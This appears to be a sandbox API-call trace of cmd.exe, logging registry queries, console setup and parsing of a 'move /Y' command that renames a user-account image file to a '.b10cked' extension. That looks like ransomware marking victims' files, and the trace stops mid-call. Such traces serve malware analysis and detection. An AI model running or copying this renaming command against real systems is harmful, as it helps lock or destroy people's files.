0x409 [0192.783] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0192.783] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fb3c | out: phkResult=0x26fb3c*=0x0) returned 0x2 [0192.783] VirtualQuery (in: lpAddress=0x26fb73, lpBuffer=0x26fb0c, dwLength=0x1c | out: 
lpBuffer=0x26fb0c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.783] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fb0c, dwLength=0x1c | out: lpBuffer=0x26fb0c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0192.783] GetConsoleOutputCP () returned 0x1b5 [0192.783] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.783] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0192.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0192.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.783] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.783] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.783] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.784] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.784] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.784] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0192.784] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0192.784] GetEnvironmentStringsW () returned 0x460190* [0192.784] FreeEnvironmentStringsW (penv=0x460190) returned 1 [0192.784] GetEnvironmentStringsW () returned 0x460190* [0192.784] FreeEnvironmentStringsW (penv=0x460190) returned 1 [0192.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0192.784] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0xb8, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.784] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.784] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x4) returned 0x0 
[0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegCloseKey (hKey=0x40) returned 0x0 [0192.785] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26eaac | out: phkResult=0x26eaac*=0x40) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x40, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x1, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x0, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x4, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x4) returned 0x0 [0192.785] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x26eab4, lpData=0x26eab8, lpcbData=0x26eab0*=0x1000 | out: lpType=0x26eab4*=0x0, lpData=0x26eab8*=0x9, lpcbData=0x26eab0*=0x1000) returned 0x2 [0192.785] RegCloseKey (hKey=0x40) returned 0x0 [0192.785] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.785] srand (_Seed=0x5b88639a) [0192.785] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"" [0192.785] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked\"" [0192.785] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.785] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4618f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.786] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.786] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0192.786] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.786] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.786] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.786] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.786] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.786] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.786] _wcsicmp 
(_String1="PROMPT", _String2="TIME") returned -4 [0192.786] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.786] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.786] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.786] GetEnvironmentStringsW () returned 0x4622e0* [0192.786] FreeEnvironmentStringsW (penv=0x4622e0) returned 1 [0192.786] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.786] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.786] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.786] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.786] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.786] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.786] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.786] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.786] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.786] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.787] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f878 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.787] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f878, lpFilePart=0x26f874 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f874*="Desktop") returned 0x18 [0192.787] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.787] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x460020 [0192.787] FindClose (in: hFindFile=0x460020 | out: hFindFile=0x460020) returned 1 [0192.787] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x460020 [0192.787] FindClose (in: hFindFile=0x460020 | out: hFindFile=0x460020) returned 1 [0192.787] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f5f4 | out: lpFindFileData=0x26f5f4) returned 0x460020 [0192.787] FindClose (in: hFindFile=0x460020 | out: hFindFile=0x460020) returned 1 [0192.787] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.787] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.787] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.787] GetEnvironmentStringsW () returned 0x462b00* [0192.788] FreeEnvironmentStringsW (penv=0x462b00) returned 1 [0192.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.788] GetConsoleOutputCP () returned 0x1b5 [0192.788] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.788] GetUserDefaultLCID () returned 0x409 [0192.788] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="0") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f9b8, cchData=128 | out: lpLCData="1") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.789] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.789] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.789] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.790] GetConsoleTitleW (in: lpConsoleTitle=0x4508e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.790] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.790] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.790] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.791] _wcsicmp (_String1="move", _String2=")") returned 68 [0192.791] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0192.791] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0192.791] _wcsicmp (_String1="IF", _String2="move") returned -4 [0192.791] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0192.791] _wcsicmp (_String1="REM", _String2="move") returned 5 [0192.791] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0192.793] GetConsoleTitleW (in: lpConsoleTitle=0x26f6b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.793] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0192.794] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0192.794] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0192.794] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0192.794] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0192.794] _wcsicmp (_String1="move", _String2="CD") returned 10 [0192.794] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0192.794] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0192.794] _wcsicmp (_String1="move", _String2="REN") returned -5 [0192.903] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0192.903] _wcsicmp (_String1="move", _String2="SET") returned -6 [0192.903] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0192.903] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0192.903] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0192.903] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0192.903] _wcsicmp (_String1="move", _String2="MD") returned 11 [0192.903] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0192.903] _wcsicmp (_String1="move", _String2="RD") returned -5 [0192.903] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0192.909] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0192.909] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0192.909] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0192.909] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0192.909] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0192.909] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0192.909] _wcsicmp (_String1="move", _String2="VER") returned -9 [0192.909] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0192.909] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0192.909] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0192.909] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0192.909] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0192.909] _wcsicmp (_String1="move", _String2="START") returned -6 [0192.909] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0192.909] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0192.910] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0192.911] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0192.911] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0192.911] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f46c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f464, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f464*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0192.912] _wcsnicmp (_String1="COPYCMD", 
_String2="LOGONSE", _MaxCount=0x7) returned -9 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0192.912] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0192.913] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0192.913] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0192.913] _wcsicmp (_String1="guest.bmp", _String2=".") returned 57 [0192.913] _wcsicmp (_String1="guest.bmp", _String2="..") returned 57 [0192.913] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp")) returned 0x20 [0192.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x461e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.913] SetErrorMode (uMode=0x0) returned 0x0 [0192.913] SetErrorMode (uMode=0x1) returned 0x0 [0192.913] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", nBufferLength=0x104, lpBuffer=0x26edf4, lpFilePart=0x26eddc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", lpFilePart=0x26eddc*="guest.bmp") returned 0x2d [0192.913] SetErrorMode (uMode=0x0) returned 0x1 [0192.913] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1")) returned 0x2010 [0192.914] _wcsicmp (_String1="guest.bmp", _String2=".") returned 57 [0192.914] _wcsicmp (_String1="guest.bmp", _String2="..") returned 57 [0192.914] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp")) returned 0x20 [0192.914] SetErrorMode (uMode=0x0) returned 0x0 [0192.914] SetErrorMode (uMode=0x1) returned 0x0 [0192.914] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", nBufferLength=0x104, lpBuffer=0x26f270, lpFilePart=0x26f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", lpFilePart=0x26f008*="guest.bmp") returned 0x2d [0192.914] SetErrorMode (uMode=0x0) returned 0x1 [0192.914] SetErrorMode (uMode=0x0) returned 0x0 [0192.914] SetErrorMode (uMode=0x1) returned 0x0 [0192.914] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26f478, lpFilePart=0x26f008 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", lpFilePart=0x26f008*="guest.bmp.b10cked") returned 0x35 [0192.914] SetErrorMode (uMode=0x0) returned 0x1 [0192.914] SetLastError (dwErrCode=0x0) [0192.914] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp.b10cked")) returned 0xffffffff [0192.914] GetLastError () returned 0x2 [0192.914] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", fInfoLevelId=0x1, lpFindFileData=0x26e984, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e984) returned 0x450e88 [0192.914] FindNextFileW (in: hFindFile=0x450e88, lpFindFileData=0x26e984 | out: lpFindFileData=0x26e984) returned 0 [0192.915] GetLastError () returned 0x12 [0192.915] FindClose (in: hFindFile=0x450e88 | out: hFindFile=0x450e88) returned 1 [0192.916] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", fInfoLevelId=0x1, lpFindFileData=0x461bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x461bf0) returned 0x450e88 [0192.916] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x26ec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked", lpFilePart=0x0) returned 0x35 [0192.916] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", nBufferLength=0x104, lpBuffer=0x26ec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp", lpFilePart=0x0) returned 0x2d [0192.916] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: 
"c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp")) returned 0x20 [0192.916] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\guest.bmp.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\guest.bmp.b10cked"), dwFlags=0x3) returned 1 [0192.917] FindClose (in: hFindFile=0x450e88 | out: hFindFile=0x450e88) returned 1 [0192.917] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ebd0 | out: _Buffer=" 1") returned 9 [0192.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.917] GetFileType (hFile=0x7) returned 0x2 [0192.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.917] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26eb5c | out: lpMode=0x26eb5c) returned 1 [0192.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.917] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eb90 | out: lpConsoleScreenBufferInfo=0x26eb90) returned 1 [0192.917] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, 